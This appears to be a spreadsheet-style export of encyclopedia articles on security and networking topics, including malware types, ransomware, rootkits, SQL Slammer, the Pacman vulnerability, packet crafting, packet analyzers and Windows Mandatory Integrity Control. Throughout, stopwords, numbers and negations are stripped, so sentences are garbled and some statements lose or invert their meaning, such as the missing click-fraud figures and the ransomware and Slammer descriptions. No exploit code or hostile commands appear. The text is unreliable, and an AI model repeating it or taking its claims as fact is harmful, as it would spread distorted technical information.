spread like viruses; instead generally installed exploiting security holes. they also hidden packaged together unrelated user-installed software. sony rootkit intended prevent illicit copying; also reported users' listening habits, unintentionally created extra security vulnerabilities.ransomware prevents user accessing files ransom paid. there variations ransomware, crypto ransomware locker ransomware. locker ransomware locks computer system without encrypting contents, whereas crypto ransomware locks system encrypts contents. example, programs cryptolocker encrypt files securely, decrypt payment substantial money.some malware used generate money click fraud, making appear computer user clicked advertising link site, generating payment advertiser. estimated 2012 active malware used kind click fraud, ad-clicks fraudulent.in addition criminal money-making, malware used sabotage, often political motives. stuxnet, example, designed disrupt specific industrial equipment. there politically motivated attacks spread shut large computer networks, including massive deletion files corruption master boot records, described "computer killing." such attacks made sony pictures entertainment november 2014, using malware known shamoon w32.disttrack) saudi aramco (august 2012). types these categories mutually exclusive, malware multiple techniques. trojan horse trojan horse harmful program misrepresents masquerade regular, benign program utility order persuade victim install trojan horse usually carries hidden destructive function activated application started. term derived ancient greek story trojan horse used invade city troy stealth.trojan horses generally spread form social engineering, example, user duped executing email attachment disguised unsuspicious, (e.g., routine form filled in), drive-by download. although payload anything, many modern forms backdoor, contacting controller (phoning home) unauthorized access affected computer, potentially installing additional software keylogger steal confidential information, cryptomining software adware generate revenue operator trojan. while trojan horses backdoors easily detectable themselves, computers appear slower, emit heat noise heavy processor network usage, occur cryptomining software installed. cryptominers limit resource usage and/or idle times attempt evade detection. unlike computer viruses worms, trojan horses generally attempt inject files otherwise propagate themselves.in spring 2017 users version proton remote access trojan (rat) trained extract password data various sources, browser auto-fill data, mac-os keychain, password vaults. rootkits once malicious software installed system, essential stays concealed, avoid detection. software packages known rootkits allow concealment, modifying host's operating system malware hidden user. rootkits prevent harmful process visible system's list processes, keep files read.some types harmful software contain routines evade identification and/or removal attempts, merely hide themselves. early example behavior recorded jargon file tale pair programs infesting xerox cp-v time sharing system: each ghost-job would detect fact killed, would start copy recently stopped program within milliseconds. kill ghosts kill simultaneously (very difficult) deliberately crash system. backdoors backdoor method bypassing normal authentication procedures, usually connection network internet. once system compromised, backdoors installed order allow access future, invisibly user. idea often suggested computer manufacturers preinstall backdoors systems provide technical support customers, never reliably verified. reported 2014 government agencies diverting computers purchased considered "targets" secret workshops software hardware permitting remote access agency installed, considered among productive operations obtain access networks around world. backdoors installed trojan horses, worms, implants, methods. infectious malware best-known types malware, viruses worms, known manner spread, rather specific types behavior likened biological viruses. worm worm stand-alone malware software actively transmits network infect computers copy without infecting files. these definitions lead observation virus requires user infected software operating system virus spread, whereas worm spreads itself. virus computer virus software usually hidden within another seemingly innocuous program produce copies insert programs files, usually performs harmful action (such destroying data). example portable execution infection, technique, usually used spread malware, inserts extra data executable code files. computer virus software embeds executable software (including operating system itself) target system without user's knowledge consent run, virus spread executable files. ransomware screen-locking ransomware lock-screens, screen lockers type “cyber police” ransomware blocks screens windows android devices false accusation harvesting illegal content, trying scare victims paying fee. jisut slocker impact android devices lock-screens, jisut making nearly percent android ransomware detections. encryption-based ransomware encryption-based ransomware, like name suggests, type ransomware encrypts files infected machine. these types malware display pop-up informing user files encrypted must (usually bitcoin) recover them. some examples encryption-based ransomware cryptolocker wannacry. grayware grayware (sometimes spelled greyware) term, coming around 2004, applies unwanted application file worsen performance computers cause security risks typically considered malware. greyware applications behave annoying undesirable manner, less serious troublesome malware. grayware encompasses spyware, adware, fraudulent dialers, joke programs ("jokeware"), remote access tools unwanted programs harm performance computers cause inconvenience. example, point, sony compact discs silently installed rootkit purchasers' computers intention preventing illicit copying. potentially unwanted program (pup) potentially unwanted programs (pups) potentially unwanted applications (puas) applications would considered unwanted despite downloaded often user, possibly failing read download agreement. pups include spyware, adware, fraudulent dialers. many security products classify unauthorised generators grayware, although frequently carry true malware addition ostensible purpose. malwarebytes lists several criteria classifying program pup. some types adware (using stolen certificates) turn anti-malware virus protection; technical remedies available. evasion since beginning 2015, sizable portion malware utilizing combination many techniques designed avoid detection analysis. from common, least common: evasion analysis detection fingerprinting environment executed. confusing automated tools' detection methods. this allows malware avoid detection technologies signature-based antivirus software changing server used malware. timing-based evasion. this malware runs certain times following certain actions taken user, executes certain vulnerable periods, boot process, remaining dormant rest time. obfuscating internal data automated tools detect malware.an increasingly common technique (2015) adware uses stolen certificates disable anti-malware virus protection; technical remedies available deal adware.nowadays, sophisticated stealthy ways evasion information hiding techniques, namely stegomalware. survey stegomalware published cabaj 2018.another type evasion technique fileless malware advanced volatile threats (avts). fileless malware require file operate. runs within memory utilizes existing system tools carry malicious acts. because files system, executable files antivirus forensic tools analyze, making malware nearly impossible detect. detect fileless malware catch operating real time. recently types attacks become frequent 432% increase 2017 makeup attacks 2018. such attacks easy perform becoming prevalent help exploit-kits. risks vulnerable software vulnerability weakness, flaw software application, complete computer, operating system, computer network exploited malware bypass defences gain privileges requires run. example, testdisk earlier contained vulnerability allowed attackers inject code windows. malware exploit security defects (security bugs vulnerabilities) operating system, applications (such browsers, e.g. older versions microsoft internet explorer supported windows xp), vulnerable versions browser plugins adobe flash player, adobe acrobat reader, java example, common method exploitation buffer overrun vulnerability, software designed store data specified region memory prevent data buffer accommodate supplied. malware provide data overflows buffer, malicious executable code data end; payload accessed attacker, legitimate software, determines. malware exploit recently discovered vulnerabilities developers time release suitable patch. even patches addressing vulnerability released, necessarily installed immediately, allowing malware take advantage systems lacking patches. sometimes even applying patches installing versions automatically uninstall versions. security advisories plug-in providers announce security-related updates. common vulnerabilities assigned listed national vulnerability database. secunia example software, free personal use, check vulnerable out-of-date software, attempt update other approaches involve using firewalls intrusion prevention systems monitor unusual traffic patterns local computer network. excessive privileges users programs assigned privileges require, malware take advantage this. example, android apps sampled, third asked privileges required. apps targeting android platform major source malware infection solution third party software detect apps assigned excessive privileges.some systems allow users modify internal structures, users today would considered over-privileged users. this standard operating procedure early microcomputer home computer systems, distinction administrator root, regular user system. systems, non-administrator users over-privileged design, sense allowed modify internal structures system. environments, users over-privileged inappropriately granted administrator equivalent status. this users tend demand privileges need, often assigned unnecessary privileges.some systems allow code executed user access rights user, known over-privileged code. this also standard operating procedure early microcomputer home computer systems. malware, running over-privileged code, privilege subvert system. almost currently popular operating systems, also many scripting applications allow code many privileges, usually sense user executes code, system allows code rights user. weak passwords credential attack occurs user account administrative privileges cracked account used provide malware appropriate privileges. typically, attack succeeds weakest form account security used, typically short password cracked using dictionary brute force attack. using strong passwords enabling two-factor authentication reduce risk. with latter enabled, even attacker crack password, cannot account without also token possessed legitimate user account. operating system homogeneity vulnerability. example, computers network operating system, upon exploiting one, worm exploit all: particular, microsoft windows large share market exploited vulnerability concentrating either operating system could subvert large number systems. estimated approximately malware infections january march 2020 spread systems running windows this risk mitigated segmenting networks different subnetworks setting firewalls block traffic them. mitigation antivirus anti-malware software anti-malware (sometimes also called antivirus) programs block remove types malware. example, microsoft security essentials (for windows vista, windows windows defender (for windows provides real-time protection. windows malicious software removal tool removes malicious software system. additionally, several capable antivirus software programs available free download internet (usually restricted non-commercial use). tests found free programs competitive commercial ones.typically, antivirus software combat malware following ways: real-time protection: they provide real time protection installation malware software computer. this type malware protection works antivirus protection anti-malware software scans incoming network data malware blocks threats comes across. removal: anti-malware software programs used solely detection removal malware software already installed onto computer. this type anti-malware software scans contents windows registry, operating system files, installed programs computer provide list threats found, allowing user choose files delete keep, compare list list known malware components, removing files match. sandboxing: provide sandboxing apps considered dangerous (such browsers vulnerabilities likely installed from). real-time protection specific component anti-malware software, commonly referred on-access real-time scanner, hooks deep operating system's core kernel functions manner similar certain malware would attempt operate, though user's informed permission protecting system. time operating system accesses file, on-access scanner checks file infected not. typically, infected file found, execution stopped file quarantined prevent damage intention prevent irreversible system damage. most allow users override behaviour. this considerable performance impact operating system, though degree impact dependent many pages creates virtual memory. sandboxing because many malware components installed result browser exploits user error, using security software (some anti-malware, though many not) "sandbox" browsers (essentially isolate browser computer hence malware induced change) also effective helping restrict damage done. website security scans website vulnerability scans check website, detect malware, note outdated software, report known security issues, order reduce risk site compromised. network segregation structuring network smaller networks, limiting flow traffic known legitimate, hinder ability infectious malware replicate across wider network. software defined networking provides techniques implement controls. "air gap" isolation "parallel network" last resort, computers protected malware, risk infected computers disseminating trusted information greatly reduced imposing "air gap" (i.e. completely disconnecting networks) applying enhanced controls entry exit software data outside world. however, malware still cross situations, least need introduce software air-gapped network damage availability integrity assets thereon. stuxnet example malware introduced target environment drive, causing damage processes supported environment without need exfiltrate data. airhopper, bitwhisper, gsmem fansmitter four techniques introduced researchers leak data air-gapped computers using electromagnetic, thermal acoustic emissions. also references external links malicious software curlie further reading: research papers documents malware idmarch (int. digital media archive) advanced malware cleaning microsoft video</t>
  </si>
  <si>
    <t>Packet generator</t>
  </si>
  <si>
    <t>packet generator packet builder type software generates random packets allows user construct detailed custom packets. depending network medium operating system, packet generators utilize sockets, ndis function calls, direct access network adapter kernel-mode driver. this useful testing implementations stacks bugs security vulnerabilities. comparison general information also packet crafting packet analyzer packetsquare</t>
  </si>
  <si>
    <t>SQLFilter</t>
  </si>
  <si>
    <t>sqlfilter plugin omnipeek indexes packets trace files sqlite database. packets searched using queries. matching packets loaded directly omnipeek analyzed. packet database also used build multi-tier data mining network forensics systems. companies save large quantities network traffic disk, tools like wildpackets sqlfilter make possible search packet data efficiently. network troubleshooters, revolutionizes finding packets. sqlfilter allow users search packets across thousands trace files, also loads resulting packets directly omnipeek etherpeek. this cuts many steps usually involved process dramatically shortens time knowledge, time fix. external links discussion sqlfilter packet data mining network forensics.</t>
  </si>
  <si>
    <t>Pacman (security vulnerability)</t>
  </si>
  <si>
    <t>pacman (stylized pacman pacman) exploit takes advantage hardware speculative execution function apple processors made public june 2022 security researchers. flaw hardware security feature called pointer authentication codes (pac) believed intrinsic platform unable patched. first implement pointer authentication. apple stated believe vulnerability posed serious danger users requires specific conditions exploited. exploit would involve combination memory corruption speculative execution. also side-channel attack references external links official website</t>
  </si>
  <si>
    <t>Packet drop attack</t>
  </si>
  <si>
    <t>computer networking, packet drop attack blackhole attack type denial-of-service attack router supposed relay packets instead discards them. this usually occurs router becoming compromised number different causes. cause mentioned research denial-of-service attack router using known ddos tool. because packets routinely dropped lossy network, packet drop attack hard detect prevent. malicious router also accomplish attack selectively, e.g. dropping packets particular network destination, certain time day, packet every packets every seconds, randomly selected portion packets. this rather called greyhound attack. malicious router attempts drop packets come attack actually discovered fairly quickly common networking tools traceroute. also, routers notice compromised router dropping traffic, generally begin remove router forwarding tables eventually traffic flow attack. however, malicious router begins dropping packets specific time period every packets, often harder detect traffic still flows across network.the packet drop attack frequently deployed attack wireless networks. because wireless networks much different architecture typical wired network, host broadcast shortest path towards destination. this, traffic directed host compromised, host able drop packets will. also mobile network, hosts specifically vulnerable collaborative attacks multiple hosts become compromised deceive hosts network. also black hole (networking) references</t>
  </si>
  <si>
    <t>Mandatory Integrity Control</t>
  </si>
  <si>
    <t>mandatory integrity control (mic) core security feature windows vista later adds mandatory access control running processes based integrity level (il). represents level trustworthiness object. this mechanism's goal restrict access permissions potentially less trustworthy contexts (processes, files, securable objects), compared contexts running user account trusted. implementation mandatory integrity control defined using access control entry (ace) type represent object's security descriptor. windows, access control lists (acls) used grant access rights (read, write, execute permissions) privileges users groups. assigned subject's access token initialized. when subject tries access object (for example, file), security reference monitor compares integrity level subject's access token integrity level object's security descriptor. windows restricts allowed access rights depending whether subject's higher lower object, depending integrity policy flags access control entry (ace). security subsystem implements integrity level mandatory label distinguish discretionary access user control acls provide. windows vista defines four integrity levels: (sid: s-1-16-4096), medium (sid: s-1-16-8192), high (sid: s-1-16-12288), system (sid: s-1-16-16384). default, processes started regular user gain medium elevated processes high introducing integrity levels, allows classes applications isolated, enabling scenarios like sandboxing potentially-vulnerable applications (such internet-facing applications). processes called low-integrity processes, less access processes higher access control enforcement windows. objects access control lists, named objects, including files, registry keys even processes threads, entry system access control list governing access them, defines minimum integrity level process object. windows makes sure process write delete object integrity level equal higher requested integrity level specified object. additionally, privacy reasons process objects higher out-of-bounds even read access processes lower il.consequently, process cannot interact another process higher process cannot perform functions inject higher process using createremotethread() function windows send data different process using writeprocessmemory() function. application while processes inherit integrity level process spawned integrity level customized time process creation. well defining boundary window messages user interface privilege isolation (uipi) technology, mandatory integrity control used applications like adobe reader, google chrome, internet explorer, windows explorer isolate documents vulnerable objects system.internet explorer introduces mic-based "protected mode" setting control whether page opened low-integrity process (provided operating system supports mic), based security zone settings, thereby preventing classes security vulnerabilities. since internet explorer case runs process, cannot modify system level objects—file registry operations instead virtualized. adobe reader google chrome notable applications introducing technology order reduce vulnerability malware.microsoft office 2010 introduced "protected view" isolated sandbox environment excel, powerpoint, word prohibits potentially unsafe documents modifying components, files, resources system. protected view operates low-integrity process and, windows vista later versions windows, uses uipi restrict sandbox.however, cases higher process need execute certain functions lower process, lower process need access resources higher process access (for example, viewing webpage protected mode, save file downloaded internet folder specified user). high processes still communicate using files, named pipes, shared objects. shared object must integrity level process shared high processes. since prevent process sharing objects higher process, trigger flaws higher process work behalf process, thereby causing squatting attack. shatter attacks, however, prevented using user interface privilege isolation takes advantage mic. also icacls security identifier mandatory access control references further reading "windows vista integrity mechanism technical reference". microsoft docs archive. microsoft. july 2007. "introduction protected mode api". microsoft docs archive. microsoft. august 2007. external links introduction windows integrity control: security focus article escaping microsoft’s protected mode internet explorer</t>
  </si>
  <si>
    <t>Packet capture appliance</t>
  </si>
  <si>
    <t>packet capture appliance standalone device performs packet capture. packet capture appliances deployed anywhere network, however, commonly placed entrances network (i.e. internet connections) front critical equipment, servers containing sensitive information. general, packet capture appliances capture record network packets full (both header payload), however, appliances configured capture subset network's traffic based user-definable filters. many applications, especially network forensics incident response, critical conduct full packet capture, though filtered packet capture used times specific, limited information gathering purposes. deployment network data packet capture appliance captures depends appliance installed network. there options deploying packet capture appliances network. option connect appliance span port (port mirroring) network switch router. second option connect appliance inline, network activity along network route traverses appliance (similar configuration network tap, information captured stored packet capture appliance rather passing another device).when connected span port, packet capture appliance receive record ethernet/ip activity ports switch router.when connected inline, packet capture appliances captures network traffic traveling points, traffic passes cable packet capture appliance connected.there general approaches deploying packet capture appliances: centralized decentralized. centralized with centralized approach, high-capacity, high-speed packet capture appliance connects data-aggregation point. advantage centralized approach appliance gain visibility network's entire traffic. this approach, however, creates single point failure attractive target hackers; additionally, would re-engineer network bring traffic appliance approach typically involves high costs. decentralized with decentralized approach place multiple appliances around network, starting point(s) entry proceeding downstream deeper network segments, workgroups. advantages include: network re-configuration required; ease deployment; multiple vantage points incident response investigations; scalability; single point failure fails, others; combined electronic invisibility, approach practically eliminates danger unauthorized access hackers; cost. cons: potential increased maintenance multiple appliances.in past, packet capture appliances sparingly deployed, oftentimes point entry network. packet capture appliances deployed effectively various points around network. when conducting incident response, ability network data flow various vantage points indispensable reducing time resolution narrowing parts network ultimately affected. placing packet capture appliances entry point front work group, following path particular transmission deeper network would simplified much quicker. additionally, appliances placed front workgroups would show intranet transmissions appliance located entry point would able capture. capacity packet capture appliances come capacities ranging more. only organizations extremely high network usage would upper ranges capacities. most organizations would well served capacities tb.a good rule thumb choosing capacity allow heavy users month regular users. typical office people average usage, would sufficient years. ratio 100/0 means simplex traffic real links even traffic features filtered full packet capture full packet capture appliances capture record ethernet/ip activity, filtered packet capture appliances capture subset traffic based user-definable filters; address, address protocol. unless using packet capture appliance specific purpose covered filter parameters, generally best full packet capture appliances otherwise risk missing vital data. particularly using packet capture network forensics cybersecurity purposes, paramount capture everything packet captured spot packet gone forever. impossible know ahead time specific characteristics packets transmissions needed, especially case advanced persistent threat (apt). apts hacking techniques rely success network administrators knowing work thus solutions place counteract them. intelligent packet capture intelligent packet capture uses machine learning filter reduce amount network traffic captured. traditional filtered packet capture relies rules policies manually configured capture potentially malicious traffic. intelligent packet capture uses machine learning models, including features cyber threat intelligence feeds, scientifically target capture threatening traffic. machine learning techniques network intrusion detection, traffic classification, anomaly detection used identify potentially malicious traffic collection. encrypted unencrypted storage some packet capture appliances encrypt captured data saving disk, others not. considering breadth information travels network internet connection least portion could considered sensitive, encryption good idea situations measure keep captured data secure. encryption also critical element authentication data purposes data/network forensics. sustained capture speed peak capture speed sustained captured speed rate packet capture appliance capture record packets without interruption error long period time. this different peak capture rate, highest speed packet capture appliance capture record packets. peak capture speed maintained short period time, appliance's buffers fill starts losing packets. many packet capture appliances share peak capture speed gbit/s, actual sustained speeds vary significantly model model. permanent overwritable storage packet capture appliance permanent storage ideal network forensics permanent record-keeping purposes data captured cannot overwritten, altered deleted. drawback permanent storage eventually appliance becomes full requires replacement. packet capture appliances overwritable storage easier manage reach capacity start overwriting oldest captured data new, however, network administrators risk losing important capture data gets overwritten. general, packet capture appliances overwrite capabilities useful simple monitoring testing purposes, permanent record necessary. permanent, non-overwritable recording must network forensics information gathering. most businesses gigabit ethernet speed networks continue time. business intends centralized packet capture appliance aggregate network data, would probably necessary packet capture appliance handle large volume data coming network. effective multiple gbit/s inline packet capture appliances placed strategically around network need re-engineer gigabit network appliance. data security since packet capture appliances capture store large amount data network activity, including files, emails communications, could, themselves, become attractive targets hacking. packet capture appliance deployed length time incorporate security features, protect recorded network data access unauthorized parties. deploying packet capture appliance introduces many additional concerns security, cost securing outweigh benefits. best approach would packet capture appliance built-in security features. these security features include encryption, methods “hide” appliance's presence network. example, packet capture appliances feature “electronic invisibility”, stealthy network profile requiring using addresses.though connecting packet capture appliance span port appears make secure, packet capture appliance would ultimately still connected network order allow management data retrieval. though accessible span link, appliance would accessible management link.despite benefits, ability control packet capture appliance remote machine presents security issue could make appliance vulnerable. packet capture appliances allow remote access robust system place protect unauthorized access. accomplish incorporate manual disable, switch toggle allows user physically disable remote access. this simple solution effective, doubtful hacker would easy time gaining physical access appliance order flip switch.a final consideration physical security. network security features world moot someone simply able steal packet capture appliance make copy ready access data stored encryption best ways address concern, though packet capture appliances also feature tamperproof enclosures. also intrusion detection packet capture packet sniffer references</t>
  </si>
  <si>
    <t>Mandriva Directory Server</t>
  </si>
  <si>
    <t>mandriva directory server (mds) ldap server developed mandriva. this similar directory server, novell edirectory etc. managing resources infrastructure within network. also fedora directory server novell edirectory list ldap software external links mandriva directory server</t>
  </si>
  <si>
    <t>Marionnet</t>
  </si>
  <si>
    <t>marionnet virtual network laboratory: allows users define, configure complex computer networks without need physical setup. only single, possibly even non-networked linux host machine required simulate whole ethernet network complete computers, routers, hubs, switches, cables, support also provided integrating virtual network physical host network. history marionnet born april 2005 simple textual interface netkit, written ocaml jean-vincent loddo paris university networking course. code since completely rewritten redesigned september 2005, order remove dependency netkit ease construction graphical interface, partly built dot. architecture extended system made general luca saiu joined project 2007, contributing particular dynamic reconfiguration aspects. system active several universities metropolitan france countries. current development marionnet reached fairly stable state successfully used teaching networks several universities around world. current development centered around making system easier average user, particular emphasis documentation. internationalization (mostly marionnet_i18n branch) gettext. marionnet presented international computer science conferences, many french events fosdem. design linux host, emulation guest machines achieved user mode linux technology allows many linux kernels user space regular processes. virtual distributed ethernet project responsible linking together machines virtual network, purpose emulate cable, switch devices allowing also introduce perturbations communication. emulated network marionnet acts coherent manager gui. marionnet example complex concurrent application written functional language, using relatively advanced programming techniques. features dynamic reconfiguration network. full binary compatibility user-level linux software runs virtual machines. ability host server graphical application (wireshark...). copy-on-write file systems, allowing economize disk space usage. "gateway" device connect virtual network host network. intuitive network diagram dynamically updated. performance marionnet showed good performance complex networks (~15 machines) even relatively machines, remaining responsive. main concern disk usage largely depends distribution choice; pinocchio custom distro developed meet average needs. uses main goal marionnet teaching computers networks university laboratories, although could valuable tool also high schools. despite teaching-oriented marionnet used emulate networks test development purposes. quite easy fast even complicated configurations possibility reverting filesystem changes virtual machines makes quite flexible. also user-mode linux ocaml language network simulation references external links marionnet official site marionnet wiki, 2009-01-15</t>
  </si>
  <si>
    <t>SQL Slammer</t>
  </si>
  <si>
    <t>slammer 2003 computer worm caused denial service internet hosts dramatically slowed general internet traffic. spread rapidly, infecting 75,000 victims within minutes. program exploited buffer overflow microsoft's server desktop engine database products. although ms02-039 patch released months earlier, many organizations applied technical details worm based proof concept code demonstrated black briefings david litchfield, initially discovered buffer overflow vulnerability worm exploited. small piece code little generate random addresses send addresses. selected address happens belong host running unpatched copy microsoft server resolution service listening port 1434, host immediately becomes infected begins spraying internet copies worm program. home generally vulnerable worm unless msde installed. worm small contain code write disk, stays memory, easy remove. example, symantec provides free charge removal utility, even removed restarting server (although machine would likely reinfected immediately). worm made possible software security vulnerability server first reported microsoft july 2002. patch available microsoft months prior worm's launch, many installations patched including many microsoft.the worm began noticed early january 2003 slowed systems worldwide. slowdown caused collapse numerous routers burden extremely high bombardment traffic infected servers. normally, traffic high routers handle, routers supposed delay temporarily stop network traffic. instead, routers crashed (became unusable), "neighbour" routers would notice routers stopped contacted (aka "removed routing table"). routers started sending notices effect routers knew about. flood routing table update notices caused additional routers fail, compounding problem. eventually crashed routers' maintainers restarted them, causing announce status, leading another wave routing table updates. soon significant portion internet bandwidth consumed routers communicating update routing tables, ordinary data traffic slowed cases stopped altogether. because slammer worm small size, sometimes able legitimate traffic not. aspects contributed slammer's rapid propagation. worm infected hosts sessionless protocol, entire worm (only bytes) fits inside single packet. result, infected host could simply "fire forget" packets rapidly possible. notes references external links newsbbc news technology virus-like attack hits traffic server worm wreaking havoc wired 11.07: slammed! layman's explanation slammer code.announcementmicrosoft security bulletin ms02-039 patch "cert advisory ca-2003-04: ms-sql server worm". carnegie mellon university software engineering institute. archived original february 2003. retrieved september 2019.{{cite web}}: maint: unfit (link) symantec security response w32.sqlexp.wormanalysisinside slammer worm ieee security privacy magazine, david moore, vern paxson, stefan savage, colleen shannon, stuart staniford, nicholas weavertechnical detailsworm code disassembled wayback machine (archived july 2011) multiple vulnerabilities microsoft server carnegie-mellon software engineering institute</t>
  </si>
  <si>
    <t>SPIM</t>
  </si>
  <si>
    <t>spim mips processor simulator, designed assembly language code architecture. program simulates r2000 r3000 processors, written james larus professor university wisconsin–madison. mips machine language often taught college-level assembly courses, especially using textbook computer organization design: hardware/software interface david patterson john hennessy (isbn 1-55860-428-6). name simulator reversal letters "mips". spim simulators available windows (pcspim), unix/linux-based (xspim) operating systems. release january 2010, simulator licensed standard license. january, 2011, major release version features qtspim user interface built cross-platform framework runs windows, linux, macos. from version, project also moved sourceforge better maintenance. precompiled versions qtspim linux (32-bit), windows, well pcspim windows provided. spim operating system spim simulator comes rudimentary operating system, allows programmer usage common used functions comfortable way. such functions invoked syscall-instruction. then acts depending values specific registers. spim expects label named main handover point os-preamble. spim alternatives/competitors mars (mips assembler runtime simulator) java-based mips assembly programming language alternative spim. initial release 2005 active development.imperas suite embedded software development tools mips architecture uses just-in-time compilation emulation simulation technology. simulator initially released 2008 active development. there open source models mips cores. other alternative spim educational purposes creator simulator. creator portable (can executed current browsers) allow students learn several assembly languages different processors time (creator includes examples mips32 risc-v instructions). also gxemul (formerly known mips64emul), another mips emulator. unlike spim, focuses emulating bare mips implementation, gxemul written emulate full computer systems based mips microprocessors—for example, gxemul emulate decstation 5000 model workstation ovpsim also emulates mips, mips models verified mips technologies qemu also emulates mips mips architecture references external links project site sourceforge former official site larus's website version spim introductory slides mips programming using spim introduction spim simulator</t>
  </si>
  <si>
    <t>Packet analyzer</t>
  </si>
  <si>
    <t>packet analyzer, also known packet sniffer, protocol analyzer, network analyzer, computer program computer hardware packet capture appliance, intercept traffic passes computer network part network. packet capture process intercepting logging traffic. data streams flow across network, analyzer captures packet and, needed, decodes packet's data, showing values various fields packet, analyzes content according appropriate specifications. packet analyzer used intercepting traffic wireless networks known wireless analyzer wifi analyzer. while packet analyzer also referred network analyzer protocol analyzer terms also meanings. protocol analyzer technically broader, general class includes packet analyzers/sniffers. however, terms frequently used intechangeably. capabilities wired shared-medium networks, ethernet, token ring, fddi, depending network structure (hub switch), possible capture traffic network single machine. modern networks, traffic captured using network switch using port mirroring, mirrors packets pass designated ports switch another port, switch supports port mirroring. network even reliable solution monitoring port since taps less likely drop packets high traffic load. wireless lans, traffic captured channel time, using multiple adapters, several channels simultaneously. wired broadcast wireless lans, capture unicast traffic machines, network adapter capturing traffic must promiscuous mode. wireless lans, even adapter promiscuous mode, packets service adapter configured usually ignored. packets, adapter must monitor mode. special provisions required capture multicast traffic multicast group packet analyzer already monitoring, broadcast traffic. when traffic captured, either entire contents packets headers recorded. recording headers reduces storage requirements, avoids privacy legal issues, often provides sufficient information diagnose problems. captured information decoded digital form human-readable format lets engineers review exchanged information. protocol analyzers vary abilities display analyze data. some protocol analyzers also generate traffic. these protocol testers. such testers generate protocol-correct traffic functional testing, also ability deliberately introduce errors test device test's ability handle errors.protocol analyzers also hardware-based, either probe format increasingly common, combined disk array. these devices record packets packet headers disk array. uses packet analyzers can: analyze network problems detect network intrusion attempts detect network misuse internal external users documenting regulatory compliance logging perimeter endpoint traffic gain information effecting network intrusion identify data collection sharing software operating systems (for strengthening privacy, control security) gathering information isolate exploited systems monitor bandwidth utilization monitor network usage (including internal external users systems) monitor data transit monitor endpoint security status gather report network statistics identify suspect content network traffic troubleshoot performance problems monitoring network data application serve primary data source day-to-day network monitoring management network users collect sensitive information login details users cookies (depending content encryption methods use) reverse engineer proprietary protocols used network debug client/server communications debug network protocol implementations verify adds, moves, changes verify internal control system effectiveness (firewalls, access control, filter, spam filter, proxy)packet capture used fulfill warrant enforcement agency wiretap network traffic generated individual. internet service providers voip providers united states must comply communications assistance enforcement regulations. using packet capture storage, telecommunications carriers provide legally required secure separate access targeted network traffic device internal security purposes. collecting data carrier system without warrant illegal laws interception. using end-to-end encryption, communications kept confidential telecommunication carriers legal authorities. notable packet analyzers also analyzer logic analyzer network detector pcap signals intelligence traffic generation model notes references external links protocol analyzers curlie</t>
  </si>
  <si>
    <t>Packet crafting</t>
  </si>
  <si>
    <t>packet crafting technique allows network administrators probe firewall rule-sets find entry points targeted system network. this done manually generating packets test network devices behaviour, instead using existing network traffic. testing target firewall, ids, tcp/ip stack, router component network. packets usually created using packet generator packet analyzer allows specific options flags created packets. packet crafting broken four stages: packet assembly, packet editing, packet play packet decoding. tools exist stages tools focused stage others ostinato encompass stages. packet assembly packet assembly creation packets sent. some popular programs used packet assembly hping, nemesis, ostinato, karat packet builder, libcrafter, libtins, pcapplusplus, scapy, wirefloss yersinia. packets protocol designed test specific rules situations. example, packet created erroneous flags ensure target machine sends reset command firewall blocks response. packet editing packet editing modification created captured packets. this involves modifying packets manners difficult impossible packet assembly stage, modifying payload packet. programs scapy, ostinato, netdude allow user modify recorded packets' fields, checksums payloads quite easily. these modified packets saved packet streams stored pcap files replayed later. packet play packet play packet replay sending pre-generated captured series packets. packets come packet assembly editing captured network attacks. this allows testing given usage attack scenario targeted network. tcpreplay common program task since capable taking stored packet stream pcap format sending packets original rate user-defined rate. scapy also supports send functions replay saved packets/pcap. ostinato added support pcap files version 0.4. some packet analyzers also capable packet replay. packet decoding packet decoding capture analysis network traffic generated packet play. order determine targeted network's response scenario created packet play, response must captured packet analyzer decoded according appropriate specifications. depending packets sent, desired response packets returned connection successfully established, among others. famous tools task wireshark scapy. also comparison packet analyzers replay attack packet sender references external links packet crafting firewall audits (part parker wikiformat article detailing packet crafting bit-twist libpcap-based ethernet packet generator packet sender open source packet generator focused ease-of-use</t>
  </si>
  <si>
    <t>Packet Sender</t>
  </si>
  <si>
    <t>packet sender open source utility allow sending receiving packets. also supports connections using ssl, intense traffic generation, http(s) get/post requests, panel generation. available windows, mac, linux. licensed general public license free software. packet sender's site says "it's designed easy still providing enough features power users need.". uses typical applications packet sender include: troubleshooting network devices network servers (send packet analyze response) troubleshooting network devices network clients (devices "phone home" udp, tcp, ssl—packet sender capture requests) testing development network protocols (send packet, device behaves appropriately) reverse-engineering network protocols security analysis (such malware) troubleshooting secure connections (using server client). automation (via packet sender's command line interface resend feature) stress-testing device (using intense network generator tool) sharing/saving/collaboration using packet sender cloud servicepacket sender comes built-in tcp, udp, server multiple ports user specifies. this remains running listening packets sending packets. features version v8.0.9 packet sender supports following features: live traffic (time from from port method error ascii hex) persistent connections http requests auth headers portable mode ipv6 client server ipv4 subnet calculator saved packets (with sending directly saved list) mixed ascii packet notation (ascii embedded syntax allow hex) multiple servers multiple servers multiple servers multicast send receive packet resending intervals (where seconds) multi-threaded tcp/ssl connections command-line interface packet responses smart packet responses macros inside packet responses time, date, unixtime, random, unique packet search (for saved packets) packet export/import intense traffic generator (udp flooding) quick-send traffic save traffic panel generation scripting buttons packet sender cloud platforms windows (64-bit) (intel-based x86-64 macs rosetta linux (source distribution x86-64 appimage snap)packet sender mobile available ios. core features desktop packet sender (send, receive, tcp, udp, cloud). also hping wireshark netcat references external links original website packet sender source code github</t>
  </si>
  <si>
    <t>STU-III</t>
  </si>
  <si>
